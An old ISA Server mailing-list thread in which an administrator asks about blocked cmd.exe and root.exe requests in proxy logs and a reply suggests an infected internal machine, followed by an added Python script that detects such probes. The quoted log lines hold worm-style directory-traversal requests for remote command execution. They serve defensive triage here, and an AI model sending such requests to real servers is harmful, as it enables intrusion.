Re: same www scripts in ISA Logs Urgent!!!

  • From: "Jim Harrison" <jim@xxxxxxxxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Thu, 21 Feb 2002 07:12:31 -0800

You've clipped quite a lot of information from the log, but since the
request is being served by "w3proxy" instead of "w3reverseproxy", it
appears that the request is coming from behind ISA.  My guess: you have an
infected machine behind the ISA server.

Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!

----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Wednesday, February 20, 2002 19:25
Subject: [isalist] same www scripts in ISA Logs Urgent!!!




Hi All,
        I am also getting the same scripts in ISA Logs. But I see in my logs
the 401 message indicating ISA did not allow the script to be executed; is
that the case?
Below are the scripts I found in ISA Logs. What is that script
www/c/wint/system32.....    What exactly is someone trying to do? How do I
block these scripts from getting executed? Please let me know urgently.
anonymous - N 2002-02-20 01:21:01 w3proxy ISA - www - - - 70 3518 http TCP GET http://www/MSADC/root.exe?/c+dir - - 401 - - -
anonymous - N 2002-02-20 01:21:03 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 401 - - -
anonymous - N 2002-02-20 01:21:05 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 401 - - -
anonymous - N 2002-02-20 01:21:07 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
- -

Regards,
vinay.
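
Added example, not part of the original thread: a Python sketch of the triage described in the reply above, flagging cmd.exe/root.exe probe requests in proxy log lines and using the service field to tell whether the source is behind ISA. The sample lines are constructed in the field layout quoted in the post, and the mapping of "w3proxy" to internal and "w3reverseproxy" to external is an assumption taken from the reply's reasoning.

```python
import re
from urllib.parse import unquote

# Constructed sample in the field layout quoted above. Lines 1-2 mirror the
# post; the w3reverseproxy and default.htm lines are invented for contrast.
SAMPLE_LOG = """\
anonymous - N 2002-02-20 01:21:01 w3proxy ISA - www - - - 70 3518 http TCP GET http://www/MSADC/root.exe?/c+dir - - 401 - - -
anonymous - N 2002-02-20 01:21:07 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 401 - - -
anonymous - N 2002-02-20 01:22:10 w3reverseproxy ISA - www - - - 80 3518 http TCP GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 404 - - -
anonymous - N 2002-02-20 01:23:00 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/default.htm - - 200 - - -
"""

LINE_RE = re.compile(
    r"(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<service>\S+) "
    r".*? (?P<method>GET|POST|HEAD) (?P<url>\S+) .*?\b(?P<status>\d{3})\b"
)
PROBE_RE = re.compile(r"/(cmd|root)\.exe\?")
# Assumption from the reply: forward-proxy traffic originates behind ISA.
ORIGIN = {"w3proxy": "internal", "w3reverseproxy": "external"}


def fully_decode(url, max_rounds=5):
    """Undo nested percent-encoding (%255c -> %5c -> \\) and normalise slashes."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url.replace("\\", "/").lower()


def classify(log_text):
    """Return (time, origin, status, url) for each probe-style request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or not PROBE_RE.search(fully_decode(m["url"])):
            continue
        origin = ORIGIN.get(m["service"], "unknown")
        findings.append((m["time"], origin, int(m["status"]), m["url"]))
    return findings


if __name__ == "__main__":
    for time, origin, status, url in classify(SAMPLE_LOG):
        print(f"{time} origin={origin} status={status} {url}")
```

With the client address column clipped, as in the posted excerpt, the script can only say which side of ISA the request came from; the unclipped log is needed to name the host.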
